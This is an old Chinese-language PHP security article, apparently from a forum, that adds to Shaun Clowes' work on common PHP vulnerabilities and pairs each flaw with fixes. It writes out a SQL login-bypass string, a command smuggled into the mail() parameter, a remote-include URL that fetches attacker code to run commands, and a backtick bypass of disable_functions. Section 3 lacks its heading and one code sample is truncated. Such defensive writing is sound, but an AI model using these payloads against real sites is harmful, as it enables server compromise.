php安全之狗尾续貂

A Study In Scarlet - Exploiting Common Vulnerabilities in
[url=javascript:;]PHP[/url]
Applications
之狗尾续貂
by san@netguard.com.cn
Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒，
考虑到了很多方面，我这个文章只是狗尾续貂，补充一些其它没怎么提到的问题。本文侧重于解决问题，而不是
攻击。
1、古老的欺骗SQL语句
在默认模式下，即使是你忘了把php.ini拷到/usr/local/lib/php.ini下，php还是打开magic_quotes_gpc＝on。
这样所有从GET/POST/Cookie来的变量的单引号(')、双引号(")、反斜杠backslash(\)以及空字元NUL
(the null byte)都会被加上反斜杠，以使
[url=javascript:;]数据库[/url]
能够正确查询。
但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized，这个优化的php.ini却是
magic_quotes_gpc＝off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
/usr/local/lib/php.ini，这时就比较危险。象比较简单的验证，假设没有过滤必要的字符：
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的
[url=javascript:;]方法[/url]
了，这个语句会
替换成这样：
select * from login where user='1' or 1='1' and pass='1' or 1='1'
因为or 1='1'成立，所以通过了。
解决的办法最好就是过滤所有不必要的字符，还有就是推荐对于从GET/POST/Cookie来的并且用在SQL
中的变量加一个自定义的函数：
function gpc2sql($str) {
    if(get_magic_quotes_gpc()==1)
        return $str;
    else
        return addslashes($str);
}
主要是为了你的程序能安全移植在各种系统里。
2、mail函数的第五个参数
在php-4.0.5的时候，mail函数引入了第五个参数，用来设置在实际发送邮件的时候增加额外的命令行参数，
但是没有很好的检查特殊SHELL命令字符，所以出现执行命令的大问题。就像手册里的例子：
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME");
这个是存在问题的，如果$SERVER_NAME=;mail san@xfocus.org ，那么我就可以用如下的url:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname这种方式运行任
意的命令。
phpMyAdmin也出现了这个问题，我们可以用它看任何我们想看的文件。但是它在include前，先用file_exist
函数判断文件是否存在，而这个file_exist是不支持远程文件的，所以上面第二种办法无法直接使用。但是我们
可以利用
[url=javascript:;]apache[/url]
的
[url=javascript:;]日志[/url]
功能，请求一个带php代码的url，这样，something指定为apache的日志也可以执行命
令了，但是apache的日志通常比较大，有太多杂乱信息。
http://www.securereality.com.au/sradv00008.txt提到的办法比较巧妙，用file upload的方式把本地
的执行命令的脚本上传，会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名，由于这时文件是存在的
，所以能通过file_exist函数，从而执行上传文件里的执行脚本。
所以对于include, require函数的使用一定要小心，特别是以包含的文件以参数指定这种方式，参数绝对不能
让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用
disable-url-fopen-wrapper 在以后的版本用allow_url_fopen ＝ off来关闭。
4、disable_function
在php-4.0.1，php.ini里引入了一项功能disable_functions , 这个功能比较有用，可以用它禁止一些函数。
比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候
只会提示Warning: system() has been disabled for security reasons.
唉，但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性，比如还可以用(`)来执行命令：
$output";
?>
这个只有设成safe_mode才能避免，可是可恶的safe_mode实在是限制太多了，做其它事情也有些碍手碍脚。
5、file upload
php文件上传的问题在文章http://www.securereality.com.au/sradv00001.html里已经描述的很清楚了，
这的确是个比较严重的问题，一般我们要上传的文件也会放在web目录，所以容易给攻击者得到系统的一些web用户
能读的文件。
幸亏在php-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数。所以php-4.0.3以上的上传文
件的程序一定不要再用copy函数了，用move_uploaded_file代替，它会检查是否是上传的文件。如果是php-4.0.2
及以下的，建议在copy前加一个函数：
function is_uploaded_file($filename) {
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
        $tmp_file = dirname(tempnam('', ''));
    }
    $tmp_file.='/'.basename($filename);
    /* User might have trailing slash in php.ini... */
    return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
这个漏洞在安全焦点呆了很久，只是在copy之前有很多验证阿、判断阿的语句，所以使之攻击存在相当的难度，赫赫。
还有，千万不要以环境变量、Cookie变量、session变量等作为关系生死的判断条件，因为这些变量太容易被伪造了。
呵呵，手头事情比较多，其它慢慢想到了再加吧，也欢迎其他同志任意的添加修改之。
参考文献
1、PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
   (http://www.securereality.com.au/studyinscarlet.txt)及analysist的翻译。
3、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
   (http://www.securereality.com.au/sradv00008.txt)